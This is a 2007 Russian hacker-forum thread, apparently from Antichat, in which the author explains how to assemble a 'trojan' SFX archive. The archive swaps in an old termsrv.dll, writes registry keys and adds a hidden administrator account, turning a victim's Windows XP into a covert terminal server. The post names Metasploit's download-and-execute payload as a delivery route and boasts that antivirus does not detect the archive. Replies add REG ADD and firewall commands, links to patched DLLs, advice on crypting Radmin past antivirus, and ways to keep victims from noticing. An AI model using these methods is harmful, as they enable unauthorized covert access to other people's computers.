Авторские статьи Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких)

Discussion in 'Статьи' started by -=lebed=-, 21 Mar 2007.

Thread Status:
Not open for further replies.
  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,957
    Reputations:
    594
    Превращение WIN-XP-SP2 в сервер терминалов (или троян от Мелкомягких)

    Предисловие.

    Многие знают, что из WIN-XP можно сделать сервер терминалов и подключаться по сети к удалённому рабочему столу удалённо, работая в отдельной ссесии с графическим интерфейсом, при этом не отключая локального пользователя. То есть в итоге мы получаем возможность входа ещё одного пользователя в систему, только удалённого.

    ссылка по теме: http://www.xakep.ru/post/28531/default.asp
    В случае прямого доступа к компьютеру это сделать несложно, заменив одну dll (termsrv.dll), настроив политики безопасности, разрешив удалённый рабочий стол и т. д.

    Наша задача провернуть всё это удалённо, имея только cmd-шелл.

    1. Подготовка​

    Нам потребуется сама termsrv.dll от старой версии (не помню какой бетты) 5.1.2600.2055 - такая у меня, прямые руки и мозги в голове.
    Обратимся к статейке (не помню кто автор, откопаю ссылку-выложу тут, позже):
    2. Сборка трояна (down-patch`а)
    Итак приступим к сборке трояна от Meлкомягких:
    Ну вот, нужная инфа у нас есть. Используем обычный SFX-архив WinRAR, чтоб положить туда три файла:
    termsrv.dll - наша dll
    key.reg - файл настроек сервера терминалов
    run.cmd - сценарий, который сделает всё необходимое.
    Определимся с путём куда будет распаковываться наш архив. Я выбрал %WinDir%\Temp (есть у любой винды)
    Можно начинать писать файл run.cmd (ему мы передадим управление после распаковки SFX-архива)
    Заменить залоченную termsrv.dll, перезаписав её у нас не получится, но мы можем её переименовать!
    Так же не забудем про то, что она может быть легко восстановлена службой System File Protection из dll - кэша, поэтому, заменим её и там (она не залочена) а в system32 уже можно скопировать под оригинальным именем.
    далее:
    Готовим файл key.reg

    Берём нашу винду, запускаем regedit и экспортируем реестр. Далее делаем все настройки удалённого рабочего стола.
    а) разрешаем его: Свойства системы -> Удалённые сеансы -> Разрешить удалённый доступ к этому компьютеру. (ставим галку)
    б) разрешаем быстрое переключение пользователей: Учётные записи пользователей-> Изменение входа пользователей в систему ставим обе галки (использовать страницу приветствия, разрешить быстрое переключение пользователей)
    Кстати, надо сделать чтоб наш пользователь не отображался в этом приветствии, так как это сразу палево, поэтому сделаем его скрытым:
    - не забудем добавить эту строку в наш key.reg (потом)
    Экспортируем реестр ещё раз, затем в TotalCommander сравниваем два файла реестра по содержимому, отслеживаем изменения и заносим их в блокнот.
    Сохраняем как файл key.reg
    Добавим туда (в начало) ещё то что, прилагалось в статье (настройка сервера терминалов и политики безопасности):
    И в конец строку, делающую нашего админа asdf невидимым в окне приглашения.

    То что у меня получилось (файл key.reg) , можно скачать тут (имхо его надо всё-таки почистить, много лишнего)

    Ну всё готово! Архивируем три файла (termsrv.dll, run.cmd, key.reg) WinRar`ом. Выставляем параметры:
    Всё, наш троян готов! (Я обозвал SFX-архив terminal.exe)

    3. Впаривание трояна​

    Используя пакет Metasplot Framework и уязвимости в Windows-XP вы можете попробовать обеспечить его загрузку (впаривание) с удалённого сервера и передачу ему управления. (полезная нагрузка win32_downloadexec)
    В общем как вы запустите его на компьютере жерты - это зависит от ваших знаний и везения.
    Один из способов описан мной в статье "Metasplot Framework часть 2 (или раздача троя)".

    Заключение.​

    Вот так можно сделать downgrade системы Win-xp-sp2, превратив её в сервер терминалов. Конечно более-менее продвинутый пользователь заметит другого пользователя в системе, убьёт учётку, может сделать откат и т. д. Поэтому в серьёз данного трояна рассматривать не стоит. Кроме того dll ранней версии может быть заменена на новую при установке, добавлении компонентов из дистрибутива и т.д. Но в локалке такая переделка актуальна.
    Можно добавить его в автозагрузку - будет даунгрейдится каждый раз при запуске.
    Минус в том, что для вступления в силу изменений потребуется перезагрузка системы (можно добавить команду перезагрузки в run.cmd) и только потом будет возможно подключится к удалённому рабочему столу.


    P.S.Тут не рассмотренна проблема, которую может создать нестандартный файрвол при подключении к серверу терминалов. (у меня был и стандартный отключен)
    Скачать готовый SFX-архив terminal.exe (внутри всё необходимое) Антивирем не палится ;-) (и вряд ли когда будет).
     
    #1 -=lebed=-, 21 Mar 2007
    Last edited: 1 Nov 2007
  2. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    класс! только вот в чем проблемка... я пробывал на себе... в общем появляеться окошко, типо "Вставте диск №2", ну да ладно жму отмену и сохранить файлы. Но после перезагрузки новый пользователь не появляеться. Пробывал на остальных юзверях в общем с SP2 ваще не катит... с SP1 прокатило. И то! двух пользователей одновременно не поддерживает. В общем в чем the problem?
     
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,957
    Reputations:
    594
    1. Всё справедливо, для Локализованной русской винды, если сидишь под админской учёткой (под ограниченной админа не добавишь). Удалённый сплоит, насколько мне известно получает права "system". Файл сценария run.cmd должен быть набран в 866 кодировке (иначе не найдётся группа "Администраторы" при добавлении нового админа).
    2. Проверь termsrv.dll - найди на системном диске все копии библиотеки и глянь версию, может всё-таки оригинальная используется и операция с заменой dll не прошла успешно...
    На неделе попробую на трёх системах WIN-XP, SP1, SP2, имхо там есть различие в функционировании службы защиты системных файлов, доведу сборку до ума, чтоб на всех трёх прокатывало...
     
    #3 -=lebed=-, 25 Mar 2007
    Last edited: 25 Mar 2007
    1 person likes this.
  4. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    м... ну я еще не такой опытный... :) в общем благодаря этой статье идейка у меня появилась, сделать что-то подобное с радмином... в общем за ранее спасибо за доработанную сборку:)
     
  5. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,118
    Reputations:
    1,139
    было бы странно палить АВ фактически родную длл винды :D
     
    1 person likes this.
  6. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,957
    Reputations:
    594
    C РАдмином уже сделано (читай мега FAQ Elekt`a по RA). Да и я тоже делал (немного по своему, хотя смысл тот же). Как раз поэтому и захотелось это сделать с сервером терминалов в XP... :)
     
  7. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    Вот в чем проблема короче делаю SFX архив
    коментарии:
    Path=C:\WINDOWS\Help\123\
    SavePath
    Setup=C:\WINDOWS\Help\123\svchost.exe
    Setup=C:\WINDOWS\Help\123\111.bat
    Setup=123.exe
    Silent=1
    Overwrite=2
    А антивирус палит, в чем the problem?
     
  8. 3DViruzZ

    3DViruzZ Member

    Joined:
    16 Jan 2007
    Messages:
    24
    Likes Received:
    10
    Reputations:
    1
    onikishov
    Не понял, откуда ты взял этот sfx. сам создал и напичкал публичными вирями чтоли? )
    Пользоваться надо sfx-сом -=lebed=- (Скачать)
    Внимательнее надо читать.
    З.Ы.: смотри не запусти случайно его у себя на компе )
     
  9. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,957
    Reputations:
    594
    Как радмин не назови - будет палится, пробуй его криптовать сначала...
     
  10. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    нет, это не вери, а радмин. Так прикол в том, что сначала проверяешь Касперским на вирусы, он светит ниче нема. А у других юзверей орет, что есть(какой антивирус не знаю).
     
  11. flipper

    flipper Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    131
    Likes Received:
    85
    Reputations:
    29
    Вместо использования key.reg можно было в run.cmd прописать что то вроде этого:
    Code:
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 00000001
    REG ADD "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000
    REG ADD "HKLM\SYSTEM\ControlSet001\Control\Terminal Server" /v fEnableSalem /t REG_DWORD /d 00000000
    REG ADD "HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_RDPWD" /v NextInstance /t REG_DWORD /d 00000001
    
    
    
     
    2 people like this.
  12. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    Лучше бы доработали,оч интересно.У самого мозгов пока что не хватает:(
     
  13. Slon

    Slon Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    123
    Likes Received:
    21
    Reputations:
    3
    Чтоб не париться вот патченая длл-ка с моей машины: http://temp.aoh.name/termsrv.dll
    Патч: http://temp.aoh.name/TS-Free-1.1.exe

    Автор молодец, статья кул +)
     
    #13 Slon, 11 Apr 2007
    Last edited: 11 Apr 2007
  14. DanST

    DanST New Member

    Joined:
    23 May 2007
    Messages:
    20
    Likes Received:
    2
    Reputations:
    -12
    А вам слабо сделать такие файлы с обратным действием??????
    (на всякий случай :))
    Мало ли ты заметил что тебя так протроили...... и ты об этом узнал.!. Конечно же тебе захочется воспользоваться де активом НО ЕГО НЕ СУЩЕСТВУЕТ!!!!!!!!!!!!!!!!!!!
     
  15. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,957
    Reputations:
    594
    Если работает служба восстановления системы (наблюдение за дисками и реестром), то всегда можно сделать откат системы, на более раннюю дату, кроме того, установка какого-либо компонента виндос, как правило, переписывает termsrv.dll на оригинальную.
     
  16. Loading

    Loading New Member

    Joined:
    23 Apr 2006
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Когда конектюсь к компу выводит такую байду

    "Интерактивный вход в систему на данном компьютере запрещен локальной политикой."

    В чём дело?

    1. Смотри в статье это: "Настройка сервера терминалов и политики безопасности".
    2. После изменений настроек политики безопасности в реестре требуется перезагрузка системы.
     
    #16 Loading, 9 Jul 2007
    Last edited by a moderator: 10 Jul 2007
  17. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    м... А где доработка? уже много времени прошло... В общем возникают проблемы только с SP2. Еще когда на компе включен NOD32 или фаер. netsh firewall add portopening TCP 3389 systerm - эта команда особо не помогает:( Если кто-то продвинулся в этом деле помогите плиз:)
     
  18. Kиt

    Kиt New Member

    Joined:
    4 Aug 2006
    Messages:
    0
    Likes Received:
    2
    Reputations:
    -3
    Почему на некоторых дедиках невылазиет окошко чтобы вставить диск ?
    Из за этого дедик терминалом нестановится ((
    Почему так ?
     
  19. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    "было бы странно палить АВ фактически родную длл винды" если включена "Проактивная защита", то спалит =) я про Касперского (kis), а так хз, неплохо )
     
    _________________________
  20. Belfigor

    Belfigor Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    156
    Likes Received:
    40
    Reputations:
    2
    Да всё бы хорошо :) но как только ты подрубаешься к машине , то у юзера вылетат msgbox , мол asdf пытается установиться связь с этим комп и тд , и если он жмёт "НЕТ " а ведь всё жмут "НЕТ", то облом , а если "ДА" то он тогда вываливается из тачки, начинаются подозрения , жаль что ничего нельзя придумать ... , если есть методы посоветуйте

    зы а так всё работает на ура ;)
     
    #20 Belfigor, 28 Dec 2007
    Last edited: 28 Dec 2007
    1 person likes this.
Thread Status:
Not open for further replies.